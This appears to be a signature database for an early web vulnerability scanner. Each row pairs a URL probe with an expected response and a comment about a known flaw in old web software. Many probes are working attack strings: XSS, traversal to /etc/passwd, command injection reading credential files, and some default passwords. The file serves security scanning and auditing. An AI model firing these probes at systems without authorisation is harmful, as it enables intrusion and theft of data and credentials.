c,generic,/,updates/,200,GET,"This might be interesting..."
c,generic,/,usage/,"Generated by The Webalizer",GET,"Webalizer may be installed. Versions lower than 2.10-09 vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,user.php?op=userinfo&uname=<script>alert('hi');</script>,"<script>alert('hi');</script>",GET,"The PhpNuke installation is vulnerable to Cross Site Scripting (XSS). Update to versions above 5.3.1. CA-2000-02."
c,generic,/,user/,200,GET,"This might be interesting..."
c,generic,/,usercp.php?function=avataroptions:javascript:alert(%27Vulnerable%27),GET,"<script>alert('Vulnerable')</script>",GET,"IcrediBB Bulletin Board System is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,userinfo.php?uid=1;,"Query",GET,"Xoops portal gives detailed error messages including SQL syntax and may allow an exploit."
c,generic,/,userlog.php,200,GET,"Teekai's Tracking Online 1.0 log can be retrieved remotely."
c,generic,/,users/,200,GET,"This might be interesting..."
c,generic,/,ustats/,200,GET,"This might be interesting..."
c,generic,/,vfs/,200,GET,"This might be interesting..."
c,generic,/,viewimg.php?path=../../../../../../../../../../etc/passwd&form=1&var=1,"root:",GET,"KorWebLog from http://weblog.kldp.org/ allows any file to be read on the system."
c,generic,/,view_source.jsp,200,GET,"Resin 2.1.2 view_source.jsp allows any file on the system to be viewed by using \..\ directory traversal. This script may be vulnerable."
c,generic,/,w3perl/admin,200,GET,"This might be interesting..."
c,generic,/,warez/,200,GET,"Uh oh..."
c,generic,/,web/,"Generated by The Webalizer",GET,"Webalizer may be installed. Versions lower than 2.10-09 vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,web/,200,GET,"This might be interesting..."
c,generic,/,web800fo/,200,GET,"This might be interesting..."
c,generic,/,webaccess.htm,200,GET,"Just found this log file..."
c,generic,/,webaccess/access-options.txt,200,GET,"Just found this file..."
c,generic,/,webadmin/,200,GET,"This might be interesting...may be HostingController, www.hostingcontroller.com"
c,generic,/,webalizer/,"Generated by The Webalizer",GET,"Webalizer may be installed. Versions lower than 2.10-09 vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,webboard/,200,GET,"This might be interesting..."
c,generic,/,webcart-lite/,200,GET,"This might be interesting..."
c,generic,/,webcart/,200,GET,"This might be interesting..."
c,generic,/,webdata/,200,GET,"This might be interesting..."
c,generic,/,weblog/,200,GET,"This might be interesting..."
c,generic,/,weblogic,"index of",GET,"Weblogic directory is available with indexing."
c,generic,/,weblogs/,200,GET,"This might be interesting..."
c,generic,/,webmail/,200,GET,"Web based mail package installed."
c,generic,/,WebShop/,200,GET,"This might be interesting..."
c,generic,/,website/,200,GET,"This might be interesting..."
c,generic,/,webstats/,200,GET,"This might be interesting..."
c,generic,/,WebTrend/,200,GET,"This might be interesting..."
c,generic,/,Web_store/,200,GET,"This might be interesting..."
c,generic,/,wstats/,200,GET,"This might be interesting..."
c,generic,/,WS_FTP.ini,200,GET,"Can contain saved passwords for ftp sites"
c,generic,/,ws_ftp.ini,200,GET,"Can contain saved passwords for ftp sites"
c,generic,/,wusage/,200,GET,"This might be interesting..."
c,generic,/,www-sql/,200,GET,"This might be interesting..."
c,generic,/,www/,200,GET,"This might be interesting..."
c,generic,/,wwwjoin/,200,GET,"This might be interesting..."
c,generic,/,wwwlog/,200,GET,"This might be interesting..."
c,generic,/,wwwstats.html,200,GET,"Just found this log file..."
c,generic,/,wwwstats/,200,GET,"This might be interesting..."
c,generic,/,zipfiles/,200,GET,"This might be interesting..."
c,generic,/,~root/,200,GET,"Allowed to browse root's home directory"
c,generic,////./../.../,boot.ini,"boot loader",GET,"Server is vulnerable to directory traversal, this may be Lidik Webserver 0.7b from lysias.de. See http://www.it-checkpoint.net/advisory/14.html for details."
c,generic,/a.jsp/,<script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"JServ is vulnerable to Cross Site Scripting (XSS) when a non-existent JSP file is requested. Upgrade to the latest version of JServ. CA-2000-02."
c,generic,/accounts/,getuserdesc.asp,200,GET,"Hosting Controller 2002 administration page is available. This should be protected."
c,generic,/achievo/,/atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://xxxxxxxxxx/,"http://xxxxxxxxxx/atk/",GET,"Achievo can be made to include php files from another domain. Upgrade to a new version."
c,generic,/Admin,/,"CobaltServer",GET,"The web server is the CobaltRaq administrator. If password protection is broken, attackers wil have access to admin your server. Use tcpwrappers or shut this down for safety."
c,generic,/admin/,"login.php?path=\"></form><form name=a><input name=i value=XSS>&lt;script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>",GET,"mcNews 1.1a from phpforums.net is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/admin/,admin_phpinfo.php4,200,GET,"Mon Album from http://www.3dsrc.com version 0.6.2d allows remote admin access. This should be protected."
c,generic,/admin/,browse.asp?FilePath=c:\&Opt=2&level=0,"winnt",GET,"Hosting Controller from hostingcontroller.com allows any file on the system to be read remotely."
c,generic,/admin/,cplogfile.log,200,GET,"DevBB 1.0 final (http://www.mybboard.com)  log file is readable remotely. Upgrade to the latest version."
c,generic,/admin/,login.php?action=insert&username=test&password=test,200,GET,"phpAuction may allow user admin accounts to be inserted without proper authentication. Attempt to log in with user 'test' password 'test' to verify."
c,generic,/Admin_files/,order.log,200,GET,"Selena Sol's WebStore 1.0 exposes order information, http://www.extropia.com/, http://www.mindsec.com/advisories/post2.txt."
c,generic,/aktivate/cgi-bin/,"catgy.cgi?key=0&cartname=axa200135022551089&desc=<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>",GET,"Aktivate Shopping Cart 1.03 and lower are vulnerable to Cross Site Scripting (XSS). http://www.allen0keul.com/aktivate/ CAN-2001-1212, CA-2000-02."
c,generic,/ans/,ans.pl?p=../../../../../usr/bin/id|&blah,"uid",GET,"Avenger's News System allows commands to be issued remotely."
c,generic,/anthill/,login.php,200,GET,"Anthill bug tracking system may be installed. Versions lower than 0.1.6.1 allow XSS/HTML injection and may allow users to bypass login requirements. http://anthill.vmlinuz.ca/ and CA-2000-02"
c,generic,/ASP/cart/database/,metacart.mdb,200,GET,"MetaCart2 is an ASP shopping cart. The database of customers is available via the web." 
c,generic,/b2-include/,b2edit.showposts.php,200,GET,"Some versions of B2 (cafelog.com) are vulnerable to remote inclusion by redefining $b2inc to a remote php file. Upgrade to a version higher than b2.06pre2. This vulnerability could not be confirmed."
c,generic,/base/webmail/,readmsg.php?mailbox=../../../../../../../../../../../../../../etc/passwd&id=1,"root:",GET,"Remote file retrieval."
c,generic,/bb-dnbd/,faxsurvey,200,GET,"This may allow arbitrary command execution."
c,generic,/cart,cart.cgi,200,GET,"If this is Dansie shopping cart 3.0.8 or earlier, it contains a backdoor to allow attackers to execute arbitrary commands."
c,generic,/ccbill/secure/,ccbill.log,200,GET,"This might be interesting... CC Bill log file?"
c,generic,/cfappman/,index.cfm,200,GET,"susceptible to ODBC/pipe-style exploit; see RFP9901 http://www.wiretrip.net/rfp/p/doc.asp/i2/d3.htm"
c,generic,/cfdocs/,cfcache.map,"Mapping",GET,"May leak directy listing, may also leave server open to a DOS"
c,generic,/cfdocs/,cfmlsyntaxcheck.cfm,200,GET,"can be used for a DoS on the server by requesting it check all .exe's"
c,generic,/cfdocs/,exampleapp/docs/sourcewindow.cfm?Template=c:\boot.ini,"boot loader",GET,"Allows attacker to view arbitrary files"
c,generic,/cfdocs/,exampleapp/email/application.cfm,200,GET,"This might be interesting..."
c,generic,/cfdocs/,exampleapp/email/getfile.cfm?filename=c:\boot.ini,"boot loader",GET,"Allows attacker to view arbitrary files"
c,generic,/cfdocs/,exampleapp/publish/admin/addcontent.cfm,200,GET,"This might be interesting..."
c,generic,/cfdocs/,exampleapp/publish/admin/application.cfm,200,GET,"This might be interesting..."
c,generic,/cfdocs/,examples/cvbeans/beaninfo.cfm,200,GET,"susceptible to our ODBC exploit; see RFP9901 http://www.wiretrip.net/rfp/p/doc.asp/i2/d3.htm"
c,generic,/cfdocs/,examples/httpclient/mainframeset.cfm,200,GET,"This might be interesting"
c,generic,/cfdocs/,examples/parks/detail.cfm,200,GET,"susceptible to our ODBC exploit; see RFP9901 http://www.wiretrip.net/rfp/p/doc.asp/i2/d3.htm"
c,generic,/cfdocs/,expeval/displayopenedfile.cfm,200,GET,"Unknown vul"
c,generic,/cfdocs/,expeval/exprcalc.cfm?OpenFilePath=c:\boot.ini,"boot loader",GET,"Allows attacker to view arbitrary files."
c,generic,/cfdocs/,expeval/openfile.cfm,200,GET,"Can use to expose the system/server path."
c,generic,/cfdocs/,expeval/sendmail.cfm,200,GET,"can be used to send email; go to the page and fill in the form"
c,generic,/cfdocs/,snippets/evaluate.cfm,200,GET,"can enter CF code to be evaluated, or create denial of service see www.allaire.com/security/ technical papers and advisories for info"
c,generic,/cfdocs/,snippets/fileexists.cfm,200,GET,"can be used to verify the existance of files (on the same drive info as the web tree/file)"
c,generic,/cfdocs/,snippets/gettempdirectory.cfm,200,GET,"depending on install, creates files, gives you physical drive info, sometimes defaults to \winnt\ directory as temp directory"
c,generic,/cfdocs/,snippets/viewexample.cfm,200,GET,"this can be used to view .cfm files, request viewexample.cfm?Tagname=..\..\..\file  (.cfm is assumed)"
c,generic,/CFIDE/administrator/,index.cfm,"PasswordProvided",GET,"Coldfusion 4.5.1 and earlier may have an overflow DoS by modifying the login page and submit 40k character passwords. This page should not be accessible to all users. CVE-2000-0538, ALLAIRE:ASB00-14, BID-1314."
c,generic,/cfide/administrator/,index.cfm,"PasswordProvided",GET,"Coldfusion 4.5.1 and earlier may have an overflow DoS by modifying the login page and submit 40k character passwords. This page should not be accessible to all users. CVE-2000-0538, ALLAIRE:ASB00-14, BID-1314."
c,generic,/cgi,/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\windows\win.ini,"[fonts]",GET,"The ColdFusion install allows attackers to read arbitrary files remotely"
c,generic,/cgi,/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\winnt\win.ini,"[fonts]",GET,"The ColdFusion install allows attackers to read arbitrary files remotely"
c,generic,/cgi-bin-sdb/,printenv,"/usr/bin/perl",GET,"SuSe is configured with a link from cgi-bin-sdb to cgi-bin. Change the accompanying 'Alias' to 'ScriptAlias' in httpd.conf"
c,generic,/cgi-bin/,"handler/netsonar;cat	/etc/passwd|?data=Dowload","root:",GET,"comes with IRIX 5.3 - 6.4; allows to run arbitrary commands"
c,generic,/cgi-bin/,.cobalt/siteUserMod/siteUserMod.cgi,200,GET,"Older versions of this CGI allow any user to change the administrator password."
c,generic,/cgi-bin/,bigconf.cgi,200,GET,"BigIP Configuration CGI"
c,generic,/cgi-bin/,common/listrec.pl,200,GET,"This CGI allows attackers to execute commands on the host."
c,generic,/cgi-bin/,dbmlparser.exe,200,GET,"This might be interesting..."
c,generic,/cgi-bin/,handler,200,GET,"comes with IRIX 5.3 - 6.4; allows to run arbitrary commands"
c,generic,/cgi-bin/,icat,200,GET,"This might be interesting..."
c,generic,/cgi-bin/,MachineInfo,200,GET,"gives out information on the machine (IRIX), including hostname"
c,generic,/cgi-bin/,pfdisplay.cgi,200,GET,"comes with IRIX 6.2-6.4; allows to run arbitrary commands"
c,generic,/cgi-bin/,webdist.cgi,200,GET,"comes with IRIX 5.0 - 6.3; allows to run arbitrary commands"
c,generic,/cgi-bin/,wrap,200,GET,"comes with IRIX 6.2; allows to view directories"
c,generic,/cgi-bin/admin/,admin.cgi,200,GET,"May be ImageFolio Pro administration CGI. Default login is Admin/ImageFolio."
c,generic,/cgi-bin/admin/,setup.cgi,200,GET,"May be ImageFolio Pro setup CGI. Default login is Admin/ImageFolio."
c,generic,/cgi-local/cgiemail-1.4/,cgicso?query=<script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"This CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/cgi-local/cgiemail-1.4/,cgicso?query=AAA,"400 Required field missing: fingerhost",GET,"This CGI allows attackers to execute remote commands."
c,generic,/cgi-local/cgiemail-1.6/,cgicso?query=<script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"This CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/cgi-local/cgiemail-1.6/,cgicso?query=AAA,"400 Required field missing: fingerhost",GET,"This CGI allows attackers to execute remote commands."
c,generic,/cgi-shop/,view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00,"root:",GET,"This CGI allows reading of remote files. CAN-2001-1019."
c,generic,/cgi-sys/,addalink.cgi,200,GET,"Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web"
c,generic,/cgi-sys/,cgiecho,200,GET,"Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web"
c,generic,/cgi-sys/,cgiemail,200,GET,"Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web"
c,generic,/cgi-sys/,countedit,200,GET,"Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web"
c,generic,/cgi-sys/,domainredirect.cgi,200,GET,"Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web"
c,generic,/cgi-sys/,entropybanner.cgi,200,GET,"Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web"
c,generic,/cgi-sys/,entropysearch.cgi,200,GET,"Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web"
c,generic,/cgi-sys/,FormMail-clone.cgi,200,GET,"Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web"
c,generic,/cgi-sys/,helpdesk.cgi,200,GET,"Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web"
c,generic,/cgi-sys/,mchat.cgi,200,GET,"Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web"
c,generic,/cgi-sys/,randhtml.cgi,200,GET,"Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web"
c,generic,/cgi-sys/,realhelpdesk.cgi,200,GET,"Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web"
c,generic,/cgi-sys/,realsignup.cgi,200,GET,"Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web"
c,generic,/cgi-sys/,scgiwrap,200,GET,"Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web"
c,generic,/cgi-sys/,signup.cgi,200,GET,"Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web"
c,generic,/cgi/,cgiproc?,200,GET,"It may be possible to crash Nortel Contivity VxWorks by requesting '/cgi/cgiproc?$' (not attempted!). Upgrade to version 2.60 or later."
c,generic,/cgis/wwwboard/,wwwboard.cgi,200,GET,"Versions 2.0 Alpha and below have multiple problems. See BID-649 and BID 1795. Default ID 'WebAdmin' with pass 'WebBoard'."
c,generic,/cgis/wwwboard/,wwwboard.pl,200,GET,"Versions 2.0 Alpha and below have multiple problems. See BID-649 and BID 1795. Default ID 'WebAdmin' with pass 'WebBoard'."
c,generic,/chassis/config/,GeneralChassisConfig.html,"Chassis Configuration",GET,"The Cabletron switch may allow remote configuration, or data retrieval, through the web interface."
c,generic,/comments/,browse.php?fid=2&tid=4&go=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;,"<script>alert('Vulnerable')</script>",GET,"php(Reactor) v1.2.7 and older are vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/config,/,200,GET,"Configuration information may be available remotely."
c,generic,/config/,checks.txt,200,GET,"This might be interesting..."
c,generic,/counter/,1/n/n/0/3/5/0/a/123.gif,200,GET,"The Roxen Counter may eat up excessive CPU time with image requests."
c,generic,/data/,member_log.txt,200,GET,"Teekai's forum full 1.2 member's log can be retrieved remotely."
c,generic,/data/userlog/,log.txt,200,GET,"Teekai's Tracking Online 1.0 log can be retrieved remotely."
c,generic,/database/,metacart.mdb,200,GET,"MetaCart2 is an ASP shopping cart. The database of customers is available via the web." 
c,generic,/dc/auth_data/,auth_user_file.txt,200,GET,"The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information."
c,generic,/dc/orders/,orders.txt,200,GET,"The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information."
c,generic,/dcforum/,dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00,"root:",GET,"This install of DCForum allows attackers to read arbitrary files on the host."
c,generic,/dcshop/auth_data/,auth_user_file.txt,200,GET,"The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information."
c,generic,/dcshop/orders/,orders.txt,200,GET,"The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information."
c,generic,/demo/ojspext/events/,globals.jsa,"event:application_OnStart",GET,"Oracle 9iAS allows .jsa files to be retrieved, which may contain sensitive information."
c,generic,/demo/sql/,index.jsp,"JSP SQL Samples",GET,"This default may allow connectivity to the Oracle databases."
c,generic,/doc,/,200,GET,"The /doc directory is browsable. This may be /usr/doc."
c,generic,/doc/packages,/,"index of /doc",GET,"This directory may show attackers all the packages installed on the system."
c,generic,/docs/,showtemp.cfm?TYPE=JPEG&FILE=c:\boot.ini,"boot loader",GET,"Gafware's CFXImage allows remote users to view any file on the system."
c,generic,/error/,"500error.jsp?et=1<script>alert('Vulnerable')</script>;","<script>alert('Vulnerable')</script>",GET,"Macromedia Sitespring 1.2.0(277.1) on Windows 2000 is vulnerable to Cross Site Scripting (XSS) in the error pages. CA-2000-02."
c,generic,/etc/,passwd,"root:",GET,"An '/etc/passwd' file is available through the web site. This may not be good at all."
c,generic,/ews/ews/,architext_query.pl,200,GET,"Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands. BID-2665."
c,generic,/examples/basic/servlet/,HelloServlet,"The source of this servlet is in",GET,"Caucho Resin from http://www.caucho.com/ reveals file system paths with a default servlet."
c,generic,/exec/show/config/,cr,"ip address",GET,"The Cisco router's web install allows arbitrary commands to be executed remotely."
c,generic,/fcgi-bin/,echo.exe?foo=<script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"Fast-CGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/fcgi-bin/,echo2.exe?foo=<script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"Fast-CGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/filemanager/,filemanager_forms.php,200,GET,"Some versions of PHProjekt allow remote file inclusions. Verify the current version is running. See http://www.securiteam.com/unixfocus/5PP0F1P6KS.html for more info"
c,generic,/forum/,bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK,"root:",GET,"The PHPNuke admin.php is vulnerable to a remote file retrieval vul. It should be upgraded to the latest version. CAN-2001-0320"
c,generic,/fpdb/,shop.mdb,200,GET,"MetaCart2 is an ASP shopping cart. The database of customers is available via the web." 
c,generic,/GW5/,GWWEB.EXE?HELP=bad-request,"Could not find file SYS",GET,"Groupwise allows system information and file retrieval by modifying arguments to the help system."
c,generic,/html/cgi-bin/,cgicso?query=<script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"This CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/html/cgi-bin/,cgicso?query=AAA,"400 Required field missing: fingerhost",GET,"This CGI allows attackers to execute remote commands."
c,generic,/instantwebmail/,message.php,200,GET,"Instant Web Mail (http://understroem.kdc/instantwebmail/) is installed. Versions 0.59 and lower can allow remote users to embed POP3 commands in URLs contained in email."
c,generic,/interscan/cgi-bin/,"FtpSave.dll?I'm%20Here","These settings have been saved",GET,"Multiple files in the Interscan management server allow attackers to change settins without auth. Upgrade to the latest version of the Interscan product."
c,generic,/jsp/jspsamp/jspexamples/,viewsource.jsp?source=../../../../../../../../../../boot.ini,"boot loader",GET,"Default JRun CGI lets users read any system file."
c,generic,/jsp/jspsamp/jspexamples/,viewsource.jsp?source=../../../../../../../../../../etc/passwd,"root:",GET,"Default JRun CGI lets users read any system file."
c,generic,/jspdocs,/,"OracleJSP",GET,"Default Oracle JSP documentation."
c,generic,/level/42/exec/,show%20conf,200,GET,"Retrieved Cisco configuration file."
c,generic,/logs,/,200,GET,"Ahh...log information...fun!"
c,generic,/logs/,access_log,200,GET,"Just found this log..."
c,generic,/mail,/,200,GET,"This might be interesting..."
c,generic,/mail/,addressaction.html?id=<USERID#>&newaddress=1&addressname=<script>alert('Vulnerable')</script>&addressemail=junk@example.com,"<script>alert('Vulnerable')</script>",GET,"IceWarp Webmail 3.3.3 is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/mailman/admin/,"ml-name?\"><script>alert('Vulnerable')</script>;","<script>alert('Vulnerable')</script>",GET,"Mailmain is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/mailman/listinfo/,<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>",GET,"Mailman is vulnerable to Cross Site Scripting (XSS). Upgrade to version 2.0.8 to fix. CA-2000-02."
c,generic,/mall_log_files/,order.log,200,GET,"EZMall2000 exposes order information, http://www.ezmall2000.com/, see http://www.mindsec.com/advisories/post2.txt for details."
c,generic,/manage/cgi/,cgiproc,200,GET,"This might be interesting..."
c,generic,/manager,/,200,GET,"May be a web server or site manager."
c,generic,/marketing,/,200,GET,"This might be interesting..."
c,generic,/mcartfree/database/,metacart.mdb,200,GET,"MetaCart2 is an ASP shopping cart. The database of customers is available via the web." 
c,generic,/members,/,200,GET,"This might be interesting..."
c,generic,/metacart/database/,metacart.mdb,200,GET,"MetaCart2 is an ASP shopping cart. The database of customers is available via the web."
c,generic,/MIDICART/,midicart.mdb,200,GET,"MIDICART database is available for browsing. This should not be allowed via the web server."
c,generic,/ministats/,admin.cgi,200,GET,"Just found this cgi..."
c,generic,/misc,/,200,GET,"This might be interesting..."
c,generic,/mkstats,/,200,GET,"This might be interesting..."
c,generic,/msql,/,200,GET,"This might be interesting..."
c,generic,/nav/,cList.php?root=</script><script>alert('Vulnerable')/<script>,<script>alert('Vulnerable')/<script>,GET,"RaQ3 server script is vulnerable to Cross Site Scripting (XSS).  CA-2000-02."
c,generic,/nuke/,modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid,"uid=",GET,"PHP-Nuke add-on NetTools below 0.3 allow for command execution. Upgrade to a new version."
c,generic,/odbc,/,200,GET,"This might be interesting..."
c,generic,/oekaki,/,".conf",GET,"The PaintBBS Server may allow unauthorized access to the config files."
c,generic,/officescan/,cgi/jdkRqNotify.exe,200,GET,"This might be interesting..."
c,generic,/officescan/hotdownload/,ofscan.ini,200,GET,"OfficeScan from Trend Micro allows anyone to read the ofscan.ini file, which may contain passwords."
c,generic,/ojspdemos/basic/,hellouser/hellouser.jsp,200,GET,"Oracle 9i default jsp page found, may be vulnerable to XSS in any field."
c,generic,/ojspdemos/basic/,simple/usebean.jsp,200,GET,"Oracle 9i default jsp page found, may be vulnerable to XSS in any field."
c,generic,/ojspdemos/basic/,simple/welcomeuser.jsp,200,GET,"Oracle 9i default jsp page found, may be vulnerable to XSS in any field."
c,generic,/old,/,200,GET,"This might be interesting..."
c,generic,/order/,order_log.dat,200,GET,"Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt"
c,generic,/order/,order_log_v12.dat,200,GET,"Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt"
c,generic,/orders/,checks.txt,200,GET,"This might be interesting..."
c,generic,/orders/,mountain.cfg,200,GET,"This might be interesting..."
c,generic,/orders/,orders.log,200,GET,"This might be interesting..."
c,generic,/orders/,orders.txt,200,GET,"This might be interesting..."
c,generic,/Orders/,order_log.dat,200,GET,"Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt"
c,generic,/orders/,order_log.dat,200,GET,"Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt"
c,generic,/Orders/,order_log_v12.dat,200,GET,"Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt"
c,generic,/orders/,order_log_v12.dat,200,GET,"Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt"
c,generic,/ows-bin/,perlidlc.bat?&dir,"ows-bin:",GET,"The Oracle web listener can be used to execute remote commands. http://www.securiteam.com/windowsntfocus/Oracle_Web_Listener_4_0_x_CGI_vulnerability.html"
c,generic,/pccsmysqladm/incs/,dbconnect.inc,200,GET,"This file should not be accessible, as it contains database connectivity information. Upgrade to version 1.2.5 or higher."
c,generic,/PDG_Cart/,oder.log,200,GET,"Shopping cart software log"
c,generic,/PDG_Cart/,shopper.conf,"Authnet_Login",GET,"PDGSoft's PDG Shopping Cart 1.5 Ęhttp://www.pdgsoft.com/ , Shopping cart software log, http://www.mindsec.com/advisories/post2.txt"
c,generic,/perl/,"-e%20%22system('cat%20/etc/passwd');\%22","root:",GET,"The installed perl interpreter allows any command to be executed remotely."
c,generic,/pforum/,edituser.php?boardid=&agree=1&username=%3Cscript%3Ealert('Vulnerable')%3C/script%3E&nickname=test&email=test@example.com&pwd=test&pwd2=test&filled=1,"<script>alert('Vulnerable')</script>",GET,"Pforum 1.14 is vulnerable to Cross Site Scripting (XSS). CA-2000-02"
c,generic,/phorum/admin/,footer.php?GLOBALS[message]=<script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"Phorum 3.3.2a and below from phorum.org is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/phorum/admin/,header.php?GLOBALS[message]=<script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"Phorum 3.3.2a and below from phorum.org is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/phorum/admin/,stats.php,"Phorum Stats",GET,"PHP based forum script Phorum allows a user to retrieve the top ten active users, including email addresses. Delete the script or pass protect it."
c,generic,/php/,mlog.phtml,200,GET,"Remote file read vulnerability CVE-1999-0346"
c,generic,/php/,mylog.phtml?screen=/etc/passwd,"root:",GET,"Remote file read vulnerability CVE-1999-0346"
c,generic,/php/,php.exe?c:\winnt\boot.ini,"boot loader",GET,"Apache/PHP installations can be misconfiugred (according to documentation) to allow files to be retrieved remotely."
c,generic,/phpBB/,bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK,"root:",GET,"The PHPNuke admin.php is vulnerable to a remote file retrieval vul. It should be upgraded to the latest version. CAN-2001-0320"
c,generic,/phpBB2/includes/,db.php,200,GET,"Some versions of db.php from phpBB2 allow remote file inclusions. Verify the current version is running. See http://www.securiteam.com/securitynews/5BP0F2A6KC.html for more info"
c,generic,/phpclassifieds/,latestwap.php?url=<script>alert('Vulnerable');</script>,"<script>alert('Vulnerable')</script>",GET,"PHP Classifieds 6.05 from http://www.deltascripts.com/ is vulnerable toCross Site Scripting (XSS). CA-2000-02."
c,generic,/phpEventCalendar/,file_upload.php,200,GET,"phpEventCalendar 1.1 and prior vulnerable to file upload bug."
c,generic,/phpnuke/,modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid,"uid=",GET,"PHP-Nuke add-on NetTools below 0.3 allow for command execution. Upgrade to a new version."
c,generic,/phprocketaddin/,?page=../../../../../../../../../../boot.ini,"boot loader",GET,"The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host."
c,generic,/phprocketaddin/,?page=../../../../../../../../../../etc/passwd,"root:",GET,"The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host."
c,generic,/pls/,sample/admin_/help/..%255cplsql.conf,"Directives added for mod-plsql",GET,"Oracle 9iAS allows mod_plsql to perform a directory traversal."
c,generic,/pls/help/,<script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"Oracle 9iAS is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/pls/portal30/,admin_/,"Gateway Configuration Menu",GET,"Default Oracle 9iAS allows unrestricted access to the mod_plsql DAD admin interface."
c,generic,/pls/simpledad/admin_/,gateway.htm?schema=sample,"Gateway Configuration Menu",GET,"This default may allow limited administration of the Oracle server."
c,generic,/project/,index.php?m=projects&user_cookie=1,200,GET,"dotProject 0.2.1.5 may allow admin login bypass by adding the user_cookie=1 to the URL."
c,generic,/pub/,english.cgi?op=rmail,200,GET,"BSCW self-registration may be enabled. This could allow untrusted users semi-trusted access to the software. 3.x version (and probably some 4.x) allow arbitrary commands to be executed remotely. See http://www.securitytracker.com/alerts/2002/Jan/1003092.html"
c,generic,/pvote/,ch_info.php,200,GET,"PVote administration page is available. Versions 1.5b and lower do not require authentication to reset the administration password."
c,generic,/pw/,storemgr.pw,200,GET,"Encrypted ID/Pass for Mercantec's SoftCart, http://www.mercantec.com/, see http://www.mindsec.com/advisories/post2.txt for more information."
c,generic,/ROADS/cgi-bin/,search.pl?form=../../../../../../../../../../etc/passwd%00,"root:",GET,"The ROADS search.pl allows attackers to retrieve system files."
c,generic,/scripts/,wsisa.dll/WService=anything?WSMadmin",200,GET,"Allows Webspeed to remotely administered. Edit unbroker.properties and set AllowMsngrCmds to 0"
c,generic,/search97cgi/,s97_cgi,200,GET,"SCO Unixware search script may be vulnerable to XSS and command injection, BID-1717, CVE-2000-1014"
